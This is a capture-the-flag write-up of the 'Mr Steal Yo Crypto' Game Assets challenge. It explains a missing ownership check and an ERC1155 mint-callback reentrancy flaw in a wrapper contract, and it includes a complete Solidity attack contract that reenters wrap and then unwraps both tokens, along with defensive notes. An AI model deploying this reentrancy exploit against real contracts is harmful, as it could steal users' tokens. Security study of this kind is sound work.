# Mr Steal Yo Crypto - Game Assets

By [Proxy](https://paragraph.com/@proxy-3) · 2024-01-26

---

### Disclaimer

This is not a walkthrough of every contract or code of the challenge. I am sharing my notes and resources I have used to complete this challenge, as well as some lessons I think are useful to take away after completing the challenge. I highly recommend you finish the challenge yourself first and only use this as additional content.

### Notes

*   `GameAsset` and `AssetHolder` seem like normal ERC721 and ERC1155 contracts
    
*   Looking at the `AssetWrapper` contract's `wrap` function, we see it immediately calls `_wrap`, which mints an ERC1155 token to the `assetOwner` parameter without checking that `assetOwner` actually owns the corresponding ERC721 token, so anyone can mint the ERC1155.
    
*   Another major problem is that `_wrap` calls the ERC1155 `_mint` function, which is a reentrancy vector: when the recipient is a contract, `_mint` makes an external call to its `onERC1155Received` hook to check that it can accept the token, and that hook runs recipient-controlled code before `wrap` has finished.
    
*   Wrapping tokens into ERC1155 can be dangerous because several ERC1155 functions hand control to another contract mid-call, and each of them is a reentry point if no `ReentrancyGuard` (or checks-effects-interactions ordering) is in place.
    
    *   The relevant ERC1155 functions are `safeTransferFrom()`, `safeBatchTransferFrom()`, `_mint()` and `_mintBatch()` (more on this in the _Resources_ section).
        
    *   All of them end with an external call to the recipient (`to`) address when it is a contract: `onERC1155Received()` for the single-id variants and `onERC1155BatchReceived()` for the batch variants. An attacker who controls the recipient contract can reenter from that hook.
        

### Attack Contract

*   The attack contract calls `wrap` for the first NFT with `assetOwner = address(this)`, and implements `onERC1155Received` so that the mint callback calls `wrap` again for the second NFT with the same `assetOwner`. Once both wraps have completed, it calls `unwrap` on both NFTs to trap them in the wrapper contract.
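
The following is an added sketch of that attack contract, written for these notes and not taken from the challenge repository or from the linked solution. It shows the control flow only: the mint callback is used to reenter `wrap` before the first `wrap` returns, and both tokens are then unwrapped. The `IAssetWrapper` interface, the parameter names and order of `wrap` and `unwrap`, and the contract and variable names are assumptions and must be matched against the real `AssetWrapper` before use.

```solidity
// SPDX-License-Identifier: MIT
pragma solidity ^0.8.13;

import {IERC1155Receiver} from "@openzeppelin/contracts/token/ERC1155/IERC1155Receiver.sol";
import {IERC165} from "@openzeppelin/contracts/utils/introspection/IERC165.sol";

// ASSUMED interface for the challenge's AssetWrapper. The notes only tell us that
// `wrap` takes an `assetOwner` parameter and that `unwrap` exists; the exact
// parameter list and order here are a guess and must be checked against the real code.
interface IAssetWrapper {
    function wrap(uint256 tokenId, address assetOwner, address assetAddress) external;
    function unwrap(uint256 tokenId, address assetAddress) external;
}

/// Example attacker: reenters AssetWrapper.wrap from the ERC1155 mint callback,
/// then unwraps both ids once the outer call has returned.
contract GameAssetsReentrancy is IERC1155Receiver {
    IAssetWrapper public immutable wrapper;
    address public immutable asset;   // the ERC721 (GameAsset) contract being wrapped
    uint256 public immutable firstId;
    uint256 public immutable secondId;
    bool private reentered;           // guard so we reenter exactly once

    constructor(address _wrapper, address _asset, uint256 _firstId, uint256 _secondId) {
        wrapper = IAssetWrapper(_wrapper);
        asset = _asset;
        firstId = _firstId;
        secondId = _secondId;
    }

    /// Step 1: wrap the first NFT with this contract as `assetOwner`.
    /// Inside the wrapper, _mint() calls back into onERC1155Received below.
    function attack() external {
        wrapper.wrap(firstId, address(this), asset);
        // Step 3: the nested wrap has finished; both ERC1155 ids are held here.
        wrapper.unwrap(firstId, asset);
        wrapper.unwrap(secondId, asset);
    }

    /// Step 2: the ERC1155 acceptance check gives us execution in the middle of
    /// the first wrap; use it to wrap the second NFT before the first one completes.
    function onERC1155Received(address, address, uint256, uint256, bytes calldata)
        external
        override
        returns (bytes4)
    {
        if (!reentered) {
            reentered = true;
            wrapper.wrap(secondId, address(this), asset);
        }
        // The selector must be returned, otherwise the wrapper's _mint reverts.
        return this.onERC1155Received.selector;
    }

    /// Not used by the attack, but required to satisfy IERC1155Receiver.
    function onERC1155BatchReceived(address, address, uint256[] calldata, uint256[] calldata, bytes calldata)
        external
        pure
        override
        returns (bytes4)
    {
        return this.onERC1155BatchReceived.selector;
    }

    function supportsInterface(bytes4 interfaceId) external pure override returns (bool) {
        return interfaceId == type(IERC1155Receiver).interfaceId
            || interfaceId == type(IERC165).interfaceId;
    }
}
```

The `reentered` flag matters: without it, the second `wrap` would mint again, call `onERC1155Received` again, and recurse until the call runs out of gas. On the defensive side, the same control flow is what a `nonReentrant` modifier on `wrap` blocks, and what ordering the ERC721 ownership check and transfer before the `_mint` (checks-effects-interactions) would make harmless.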
    

### Resources

*   [Challenge link](https://mrstealyocrypto.xyz/game-assets/index.html)
    
*   [Github contracts](https://github.com/0xToshii/mr-steal-yo-crypto-ctf-foundry/tree/implement/src/game-assets)
    
*   [Attack contract](https://github.com/Proxy1967/mr-steal-yo-crypto-ctf-foundry/blob/implement/test/AttackContracts/3-GameAssetsAttack.sol)
    
*   [Test file with solution](https://github.com/Proxy1967/mr-steal-yo-crypto-ctf-foundry/blob/implement/test/3-game-assets.sol)
    
*   [Where to find solidity reentrancy attacks (RareSkills)](https://www.rareskills.io/post/where-to-find-solidity-reentrancy-attacks)

---

*Originally published on [Proxy](https://paragraph.com/@proxy-3/mr-steal-yo-crypto-game-assets)*
